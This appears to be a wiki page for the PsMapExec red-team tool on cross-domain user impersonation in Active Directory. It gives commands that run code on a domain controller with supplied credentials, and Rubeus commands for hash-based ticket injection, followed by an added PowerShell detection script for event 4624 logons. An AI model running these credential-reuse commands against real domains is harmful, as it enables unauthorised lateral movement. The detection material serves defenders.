
05 ‐ Cross Domain Usage

The-Viper-One edited this page Jun 3, 2025 · 8 revisions

Overview

PsMapExec allows for user impersonation across trusted Active Directory domains, enabling access to resources in a different domain than the one the user's account resides in.

Domain Targeting

To impersonate a user from one domain and access resources in another, two key parameters must be specified:

  • -Domain: The domain you intend to access resources in.
  • -Username: The user account to impersonate, provided in UPN (User Principal Name) format, e.g. moe@security.local.

Command Example

PsMapExec [Method] -Targets All -Domain dev.security.local -Username "moe@security.local" -Password "Password123" -Command "whoami"

In this example:

  • We're targeting a Domain Controller in dev.security.local.
  • The user moe@security.local (from the parent domain) is being impersonated.
  • Since security.local is the parent domain of dev.security.local, an implicit trust exists, allowing Moe to authenticate and access resources in the child domain.

Example Output

PS > PsMapExec WMI -Targets DEVDC01 -Domain dev.security.local -Username moe@security.local -Password Password123 -Command whoami

WMI   10.10.10.150    DEVDC01.dev.security.local   Windows Server 2022 Standard   [+] SUCCESS
security\moe

Using a Separate Logon Session

Instead of supplying credentials directly, you can create a new logon session under the context of a user from another domain. This is useful for OPSEC or when reusing credential material (e.g., hashes or tickets).

Tools

  • Runas.exe: Best when you have the password.
  • Rubeus: Preferred when you need to use a hash or Kerberos ticket.

Create a Logon Session

# Using Runas.exe with a password
Runas.exe /user:domain\user powershell.exe

# Using Rubeus to start a netonly session
Rubeus.exe createnetonly /program:c:\windows\system32\cmd.exe /show

# Using Rubeus to request and inject a TGT
Rubeus.exe asktgt /user:User /domain:Domain /hash:Hash /ptt

Once the new session is active, execute PsMapExec without supplying any credential parameters, as it will use the current session's context.

PsMapExec [Method] -Targets All -Domain [Domain] -Command "whoami"
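Seen from the defending side, both ways of working across a trust leave Security event 4624 behind: a type 9 (NewCredentials) logon on the host where a createnetonly or runas /netonly session is created, and a type 3 network logon on the target in which the impersonated account carries its own domain (security\moe on DEVDC01 in the output above). The PowerShell below is an added example, not part of PsMapExec or this wiki; it assumes the 4624 events have been exported as XML strings, that the logging host's NetBIOS domain is supplied by the caller, and the function name, host names and sample events are constructed.

```powershell
# Added example, not PsMapExec code: flag the two Security-log (event 4624) footprints
# of a cross-domain impersonation. Input is 4624 events as XML strings, e.g. from
#   Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624} | ForEach-Object { $_.ToXml() }
function Find-CrossDomainLogon {
    param(
        [Parameter(Mandatory)][string[]]$EventXml,
        [Parameter(Mandatory)][string]$HostDomain   # NetBIOS domain of the logging host, e.g. DEV
    )
    foreach ($raw in $EventXml) {
        $evt = [xml]$raw
        # Collapse the <Data Name="...">value</Data> elements into a lookup table
        $data = @{}
        foreach ($item in $evt.Event.EventData.Data) { $data[$item.Name] = $item.'#text' }

        $type       = $data['LogonType']
        $acctDomain = $data['TargetDomainName']
        $reason = switch ($type) {
            # Type 9 (NewCredentials): runas /netonly or Rubeus createnetonly on the operator's host.
            # The "New Logon" fields repeat the caller's own identity, so only the type reveals it.
            '9' { 'netonly logon session created' }
            # Type 3 (Network): on the target, the impersonated account carries its own domain,
            # e.g. SECURITY\moe logging on to a host in DEV.
            '3' {
                if ($acctDomain -and $acctDomain -ne $HostDomain -and $acctDomain -ne 'NT AUTHORITY') {
                    "network logon from foreign domain $acctDomain"
                }
            }
        }
        if ($reason) {
            [pscustomobject]@{
                Computer  = $evt.Event.System.Computer
                Account   = "$acctDomain\$($data['TargetUserName'])"
                LogonType = $type
                SourceIP  = $data['IpAddress']
                Reason    = $reason
            }
        }
    }
}

# Constructed sample events (not real logs): a netonly session on the operator's workstation,
# the resulting network logon of security\moe on DEVDC01, and a benign same-domain logon.
$ns = 'http://schemas.microsoft.com/win/2004/08/events/event'
$netonly = "<Event xmlns='$ns'><System><EventID>4624</EventID><Computer>OPS01.dev.security.local</Computer></System><EventData><Data Name='TargetUserName'>operator</Data><Data Name='TargetDomainName'>DEV</Data><Data Name='LogonType'>9</Data><Data Name='IpAddress'>-</Data></EventData></Event>"
$foreign = "<Event xmlns='$ns'><System><EventID>4624</EventID><Computer>DEVDC01.dev.security.local</Computer></System><EventData><Data Name='TargetUserName'>moe</Data><Data Name='TargetDomainName'>SECURITY</Data><Data Name='LogonType'>3</Data><Data Name='IpAddress'>10.10.10.5</Data></EventData></Event>"
$benign  = "<Event xmlns='$ns'><System><EventID>4624</EventID><Computer>DEVDC01.dev.security.local</Computer></System><EventData><Data Name='TargetUserName'>alice</Data><Data Name='TargetDomainName'>DEV</Data><Data Name='LogonType'>3</Data><Data Name='IpAddress'>10.10.10.20</Data></EventData></Event>"

# Expect two hits: the type-9 session on OPS01 and SECURITY\moe's network logon on DEVDC01
Find-CrossDomainLogon -EventXml @($netonly, $foreign, $benign) -HostDomain 'DEV' | Format-Table -AutoSize
```

Legitimate cross-trust access by administrators produces the same type 3 pattern, so the foreign-domain hits are a triage list to compare against expected accounts, not an alert on their own.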